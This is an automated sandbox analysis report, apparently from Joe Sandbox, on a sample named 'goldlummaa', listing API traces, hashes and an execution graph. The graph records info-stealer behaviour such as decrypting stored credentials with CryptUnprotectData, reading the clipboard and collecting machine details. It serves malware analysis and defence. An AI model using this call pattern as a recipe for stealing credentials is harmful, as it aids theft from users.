                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00C6DFA3
                                                                                                                  • GetLastError.KERNEL32 ref: 00C6E046
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2112829910-0
                                                                                                                  • Opcode ID: 3627e85238dd6b8dc4359e2f9c7fc6465f859262ff04b4945ac49e069904c031
                                                                                                                  • Instruction ID: 150e0b8e4a3efaf36c3a19130549cb76f83bbbf913184abc63e0d71b5237ba5a
                                                                                                                  • Opcode Fuzzy Hash: 3627e85238dd6b8dc4359e2f9c7fc6465f859262ff04b4945ac49e069904c031
                                                                                                                  • Instruction Fuzzy Hash: B5D16B75E00248DFCB25CFA8D8C4AADBBB5FF09310F28416AE566EB351D730A946CB50
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AdjustPointer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1740715915-0
                                                                                                                  • Opcode ID: e109ccbcc6e2d90ce334f64b8ab7651354f8ddca63a840b67cb9be2cf65cb845
                                                                                                                  • Instruction ID: 26c2d6608394a1c378ef266aded2e16e863faf77d417657e1e2fa51737b0b898
                                                                                                                  • Opcode Fuzzy Hash: e109ccbcc6e2d90ce334f64b8ab7651354f8ddca63a840b67cb9be2cf65cb845
                                                                                                                  • Instruction Fuzzy Hash: A351C3716016069FEB398F54D8C1BBA77A4EF04710F24462DFA16972A1EF31ED88EB50
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00C6C8A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00C6D6D0,?,00000000,-00000008), ref: 00C6C902
                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,00C6C0CE,?,?,?,00000000), ref: 00C6BD8C
                                                                                                                  • __dosmaperr.LIBCMT ref: 00C6BD93
                                                                                                                  • GetLastError.KERNEL32(00000000,00C6C0CE,?,?,00000000,?,?,?,00000000,00000000,?,00C6C0CE,?,?,?,00000000), ref: 00C6BDCD
                                                                                                                  • __dosmaperr.LIBCMT ref: 00C6BDD4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1913693674-0
                                                                                                                  • Opcode ID: 276a43e9f687837c9c14840d096ee51d98945d23baf38b1546d877a143a43661
                                                                                                                  • Instruction ID: b8a8a5eb33efdcc32f3bbda2b397d3cf058218a15423ed707b102c81cf065ecb
                                                                                                                  • Opcode Fuzzy Hash: 276a43e9f687837c9c14840d096ee51d98945d23baf38b1546d877a143a43661
                                                                                                                  • Instruction Fuzzy Hash: CE21D171600206BFDB30AFA6CCC0D6BB7A8FF443647108428F829DB151DB31ED92AB91
                                                                                                                  APIs
                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 00C6C9A5
                                                                                                                    • Part of subcall function 00C6C8A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00C6D6D0,?,00000000,-00000008), ref: 00C6C902
                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C6C9DD
                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C6C9FD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 158306478-0
                                                                                                                  • Opcode ID: f7de81376219aae8ad7308b5eceaf056f3596758cfc9a96a329bb49080482a94
                                                                                                                  • Instruction ID: 3afbbbff5839fcabae08682efcaa146f85b5fe0f67433f6fcf681e9d18bee32a
                                                                                                                  • Opcode Fuzzy Hash: f7de81376219aae8ad7308b5eceaf056f3596758cfc9a96a329bb49080482a94
                                                                                                                  • Instruction Fuzzy Hash: 0F11D6F190561DBFA731A7F29CCDDBF295CDE583A43100025F656E2142FE64CE41A6B1
                                                                                                                  APIs
                                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00C61E2D
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00C61E3B
                                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00C61E54
                                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00C61E93
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2261580123-0
                                                                                                                  • Opcode ID: de16345321e050a086a3ac47f5e54f66b1e3a35382ea5aae9e0577637b1468f3
                                                                                                                  • Instruction ID: 2da6e6eb0d424ced58eb7fde2157d86eae6ba6fe01fb81cf9ec5d7634608008e
                                                                                                                  • Opcode Fuzzy Hash: de16345321e050a086a3ac47f5e54f66b1e3a35382ea5aae9e0577637b1468f3
                                                                                                                  • Instruction Fuzzy Hash: 4621E4B0E042098FCB18EFA8C485BAEBBF1EF48300F05845DE859A7351DB399A41DF61
                                                                                                                  APIs
                                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00C6F4A1,00000000,00000001,00000000,?,?,00C6E09A,?,00000000,00000000), ref: 00C6FD17
                                                                                                                  • GetLastError.KERNEL32(?,00C6F4A1,00000000,00000001,00000000,?,?,00C6E09A,?,00000000,00000000,?,?,?,00C6D9E0,00000000), ref: 00C6FD23
                                                                                                                    • Part of subcall function 00C6FD74: CloseHandle.KERNEL32(FFFFFFFE,00C6FD33,?,00C6F4A1,00000000,00000001,00000000,?,?,00C6E09A,?,00000000,00000000,?,?), ref: 00C6FD84
                                                                                                                  • ___initconout.LIBCMT ref: 00C6FD33
                                                                                                                    • Part of subcall function 00C6FD55: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00C6FCF1,00C6F48E,?,?,00C6E09A,?,00000000,00000000,?), ref: 00C6FD68
                                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00C6F4A1,00000000,00000001,00000000,?,?,00C6E09A,?,00000000,00000000,?), ref: 00C6FD48
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2744216297-0
                                                                                                                  • Opcode ID: a48029367084bc7ed9f1b0d20f43ddddbe072618b003fcf21a9154b7b476c651
                                                                                                                  • Instruction ID: 06b96782cf60b77791e5206782692cd02750350900cc60ca3230386906187f0b
                                                                                                                  • Opcode Fuzzy Hash: a48029367084bc7ed9f1b0d20f43ddddbe072618b003fcf21a9154b7b476c651
                                                                                                                  • Instruction Fuzzy Hash: 30F0C036540116BBCF232F95EC4CB9E3F26FB493A1B044124FA1D95130DA7299A5AB91
                                                                                                                  APIs
                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00C64F13
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00C64F22
                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00C64F2B
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 00C64F38
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2933794660-0
                                                                                                                  • Opcode ID: 332bb9336269f4b4d79c33b330545a4299c237ae359ea57905ef6962271392d7
                                                                                                                  • Instruction ID: 9a6e7c6a1abb1b3c8b5c7dff978cee3f769a0edd9055681235deb87039a01d3f
                                                                                                                  • Opcode Fuzzy Hash: 332bb9336269f4b4d79c33b330545a4299c237ae359ea57905ef6962271392d7
                                                                                                                  • Instruction Fuzzy Hash: 17F06274D5020DEBCB00DBB4DA49B9EBBF4FF1C204BA14995A516E7110EB30AB889B51
                                                                                                                  APIs
                                                                                                                  • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00C68AFE,?,?,00000000,00000000,00000000,?), ref: 00C68C22
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: EncodePointer
                                                                                                                  • String ID: MOC$RCC
                                                                                                                  • API String ID: 2118026453-2084237596
                                                                                                                  • Opcode ID: b8af197d8859dd278308d1cbf33da83bc74e9f16143d7ba9f59526157ff31f20
                                                                                                                  • Instruction ID: a0e2df37cfabdccd9e00604075e44e839d4ed4a9558bd7bfd95eaf5f44d018d0
                                                                                                                  • Opcode Fuzzy Hash: b8af197d8859dd278308d1cbf33da83bc74e9f16143d7ba9f59526157ff31f20
                                                                                                                  • Instruction Fuzzy Hash: 8C418A71900209EFCF25DF98CD81AEE7BB5FF48304F144659FA1467251D7359A50DB60
                                                                                                                  APIs
                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00C686E0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ___except_validate_context_record
                                                                                                                  • String ID: csm$csm
                                                                                                                  • API String ID: 3493665558-3733052814
                                                                                                                  • Opcode ID: e18761915babe4a514628ee9eaa99c03599d9fb2baf91e0370bb6c98822550df
                                                                                                                  • Instruction ID: 749f169c7555a7e068ed66d6e3e98ae38940298b14e8f5798ceca97803932b8f
                                                                                                                  • Opcode Fuzzy Hash: e18761915babe4a514628ee9eaa99c03599d9fb2baf91e0370bb6c98822550df
                                                                                                                  • Instruction Fuzzy Hash: 6331B536400219DBCF368F50DCC49AA7BE6FF08715B384759F86449221DB32CDA6EB91

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:7.3%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:43.3%
                                                                                                                  Total number of Nodes:238
                                                                                                                  Total number of Limit Nodes:20
                                                                                                                  execution_graph 21647 438e47 21648 438e51 RtlAllocateHeap 21647->21648 21807 42e506 CoSetProxyBlanket 21654 40e648 CoInitializeSecurity 21655 40b44c 21659 40b45a 21655->21659 21660 40b57c 21655->21660 21656 40b65c 21658 43a950 2 API calls 21656->21658 21658->21660 21659->21656 21659->21660 21661 43a950 21659->21661 21662 43a976 21661->21662 21663 43a995 21661->21663 21664 43a968 21661->21664 21666 43a98a 21661->21666 21667 43a97b RtlReAllocateHeap 21662->21667 21668 438e70 21663->21668 21664->21662 21664->21663 21666->21656 21667->21666 21669 438e83 21668->21669 21670 438e94 21668->21670 21671 438e88 RtlFreeHeap 21669->21671 21670->21666 21671->21670 21672 43aecc 21674 43af00 21672->21674 21673 43af7e 21674->21673 21676 43a9b0 LdrInitializeThunk 21674->21676 21676->21673 21808 408790 21810 40879f 21808->21810 21809 408970 ExitProcess 21810->21809 21811 4087b4 GetCurrentProcessId GetCurrentThreadId 21810->21811 21812 40896b 21810->21812 21813 4087da 21811->21813 21814 4087de SHGetSpecialFolderPathW GetForegroundWindow 21811->21814 21820 43a930 FreeLibrary 21812->21820 21813->21814 21816 40887a 21814->21816 21816->21812 21817 408966 21816->21817 21819 40b9d0 FreeLibrary FreeLibrary 21817->21819 21819->21812 21820->21809 21677 40db51 21678 40db5d 21677->21678 21695 423410 21678->21695 21680 40db7f 21702 425990 21680->21702 21684 40dbc6 21727 4310d0 OpenClipboard 21684->21727 21686 40dc10 21687 423410 2 API calls 21686->21687 21688 40dc4e 21687->21688 21689 425990 2 API calls 21688->21689 21690 40dc8c 21689->21690 21691 425e90 3 API calls 21690->21691 21692 40dc95 21691->21692 21693 4310d0 6 API calls 21692->21693 21694 40dcdf 21693->21694 21698 4234b0 21695->21698 21696 4235af 21734 41f040 RtlFreeHeap LdrInitializeThunk 21696->21734 21698->21696 21699 43cfb0 LdrInitializeThunk 21698->21699 21701 423673 21698->21701 21735 43d2f0 RtlFreeHeap LdrInitializeThunk 21698->21735 21699->21698 21701->21680 21703 4259c0 21702->21703 21706 425a2e 21703->21706 21736 43a9b0 LdrInitializeThunk 21703->21736 21704 40dbbd 21710 425e90 21704->21710 21706->21704 21709 425b1e 21706->21709 21737 43a9b0 LdrInitializeThunk 21706->21737 21707 438e70 RtlFreeHeap 21707->21704 21709->21707 21738 425eb0 RtlFreeHeap LdrInitializeThunk 21710->21738 21712 425ea4 21712->21684 21713 425e99 21713->21712 21739 4370b0 RtlFreeHeap LdrInitializeThunk 21713->21739 21715 426913 21747 43c9a0 21715->21747 21716 4266e2 21716->21715 21716->21716 21719 426905 CopyFileW 21716->21719 21720 426927 21716->21720 21723 4266f5 21716->21723 21719->21715 21740 43ccb0 LdrInitializeThunk 21720->21740 21721 426974 21725 4269a9 21721->21725 21726 426ae5 21721->21726 21741 43cd60 21721->21741 21723->21684 21725->21684 21725->21725 21725->21726 21751 43a9b0 LdrInitializeThunk 21725->21751 21726->21684 21726->21726 21728 4310f4 GetWindowLongW GetClipboardData 21727->21728 21729 43124f 21727->21729 21730 43112b GlobalLock 21728->21730 21731 431249 CloseClipboard 21728->21731 21729->21686 21733 431141 21730->21733 21731->21729 21732 43123d GlobalUnlock 21732->21731 21733->21732 21734->21701 21735->21698 21736->21706 21737->21709 21738->21713 21739->21716 21740->21721 21742 43cd80 21741->21742 21745 43cdbe 21742->21745 21752 43a9b0 LdrInitializeThunk 21742->21752 21743 43ce3e 21743->21725 21745->21743 21753 43a9b0 LdrInitializeThunk 21745->21753 21748 43c9c0 21747->21748 21749 43cace 21748->21749 21754 43a9b0 LdrInitializeThunk 21748->21754 21749->21720 21751->21723 21752->21745 21753->21743 21754->21749 21821 40ea11 CoInitializeEx CoInitializeEx 21822 422e93 21823 422e9b 21822->21823 21831 43cb20 21823->21831 21825 423137 21827 423281 21825->21827 21835 4210e0 21825->21835 21828 423121 GetLogicalDrives 21830 43cb20 LdrInitializeThunk 21828->21830 21829 422fd1 21829->21825 21829->21827 21829->21828 21829->21829 21830->21825 21832 43cb40 21831->21832 21833 43cc5e 21832->21833 21848 43a9b0 LdrInitializeThunk 21832->21848 21833->21829 21836 43c9a0 LdrInitializeThunk 21835->21836 21838 421123 21836->21838 21837 421832 21837->21827 21838->21837 21847 4211d2 21838->21847 21849 43a9b0 LdrInitializeThunk 21838->21849 21840 438e70 RtlFreeHeap 21841 4217ca 21840->21841 21841->21837 21851 43a9b0 LdrInitializeThunk 21841->21851 21843 4217af 21843->21840 21844 4218a0 21843->21844 21844->21827 21846 438e70 RtlFreeHeap 21846->21847 21847->21843 21847->21846 21850 43a9b0 LdrInitializeThunk 21847->21850 21848->21833 21849->21838 21850->21847 21851->21841 21852 43ab91 21853 43ab9a GetForegroundWindow 21852->21853 21854 43abad 21853->21854 21860 40d696 21862 40d6f0 21860->21862 21861 40d73e 21862->21861 21864 43a9b0 LdrInitializeThunk 21862->21864 21864->21861 21866 4156a0 21867 4156a5 21866->21867 21876 4156fe 21867->21876 21879 43a9b0 LdrInitializeThunk 21867->21879 21869 415b79 21870 415c0b 21869->21870 21871 415ef8 21869->21871 21874 415ca6 21869->21874 21877 415cd0 21869->21877 21880 41bea0 LdrInitializeThunk 21870->21880 21881 41bea0 LdrInitializeThunk 21871->21881 21875 415948 CryptUnprotectData 21875->21869 21875->21876 21876->21869 21876->21875 21877->21871 21877->21874 21878 43cb20 LdrInitializeThunk 21877->21878 21878->21877 21879->21876 21880->21874 21881->21874 21882 438ea0 21883 438ec0 21882->21883 21885 438f3e 21883->21885 21890 43a9b0 LdrInitializeThunk 21883->21890 21885->21885 21887 439110 21885->21887 21889 43905e 21885->21889 21891 43a9b0 LdrInitializeThunk 21885->21891 21886 438e70 RtlFreeHeap 21886->21887 21889->21886 21890->21885 21891->21889 21892 43d0a0 21893 43d0c0 21892->21893 21895 43d0fe 21893->21895 21900 43a9b0 LdrInitializeThunk 21893->21900 21895->21895 21897 43d2d6 21895->21897 21899 43d1ef 21895->21899 21901 43a9b0 LdrInitializeThunk 21895->21901 21896 438e70 RtlFreeHeap 21896->21897 21899->21896 21899->21899 21900->21895 21901->21899 21902 435ea0 21903 435ec5 21902->21903 21905 435f79 21903->21905 21911 43a9b0 LdrInitializeThunk 21903->21911 21906 43606c 21905->21906 21908 43617c 21905->21908 21910 43a9b0 LdrInitializeThunk 21905->21910 21906->21908 21912 43a9b0 LdrInitializeThunk 21906->21912 21910->21905 21911->21903 21912->21906 21913 40dd25 21914 40dd2b 21913->21914 21915 40dd35 CoUninitialize 21914->21915 21916 40dd60 21915->21916 21917 435029 21918 435056 21917->21918 21919 43506a GetUserDefaultUILanguage 21918->21919 21920 43508d 21919->21920 21760 43b068 21761 43b080 21760->21761 21763 43b16e 21761->21763 21766 43a9b0 LdrInitializeThunk 21761->21766 21764 43b23f 21763->21764 21767 43a9b0 LdrInitializeThunk 21763->21767 21764->21764 21766->21763 21767->21764 21921 420b30 21922 420b44 21921->21922 21926 420c51 21921->21926 21927 420c70 21922->21927 21924 420c2c 21925 41f0e0 LdrInitializeThunk 21924->21925 21924->21926 21925->21926 21928 420c80 21927->21928 21928->21928 21929 43cb20 LdrInitializeThunk 21928->21929 21930 420d8f 21929->21930 21768 40cff3 21769 40d010 21768->21769 21772 4361e0 21769->21772 21771 40d053 21773 436210 CoCreateInstance 21772->21773 21775 4367c2 21773->21775 21776 43641c SysAllocString 21773->21776 21777 4367d2 GetVolumeInformationW 21775->21777 21779 43648d 21776->21779 21786 4367f0 21777->21786 21780 4367b2 SysFreeString 21779->21780 21781 436495 CoSetProxyBlanket 21779->21781 21780->21775 21782 4364b5 SysAllocString 21781->21782 21783 4367a8 21781->21783 21785 436580 21782->21785 21783->21780 21785->21785 21787 43659c SysAllocString 21785->21787 21786->21771 21789 4365c3 21787->21789 21788 436796 SysFreeString SysFreeString 21788->21783 21789->21788 21790 436785 21789->21790 21791 43660e VariantInit 21789->21791 21790->21788 21793 436660 21791->21793 21792 436774 VariantClear 21792->21790 21793->21792 21931 43d830 21932 43d841 21931->21932 21934 43d92e 21932->21934 21939 43a9b0 LdrInitializeThunk 21932->21939 21936 43da4e 21934->21936 21937 43db06 21934->21937 21940 43a9b0 LdrInitializeThunk 21934->21940 21935 438e70 RtlFreeHeap 21935->21937 21936->21935 21939->21934 21940->21936 21941 431839 21942 43183e 21941->21942 21943 431874 GetSystemMetrics GetSystemMetrics 21942->21943 21944 4318b3 21943->21944 21945 4223b8 21946 422477 21945->21946 21947 4226d0 21945->21947 21948 4223d3 21945->21948 21947->21946 21949 4229fd 21947->21949 21959 43a9b0 LdrInitializeThunk 21947->21959 21948->21946 21948->21947 21951 422caa 21948->21951 21956 43a9b0 LdrInitializeThunk 21948->21956 21949->21946 21957 43a9b0 LdrInitializeThunk 21949->21957 21958 43a9b0 LdrInitializeThunk 21951->21958 21954 422cc3 21956->21948 21957->21949 21958->21954 21959->21947 21799 42b4fc 21800 42b520 21799->21800 21800->21800 21801 42b5f4 FreeLibrary 21800->21801 21802 42b604 21801->21802 21803 42b614 GetComputerNameExA 21802->21803 21804 42b670 GetComputerNameExA 21803->21804 21806 42b760 21804->21806

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
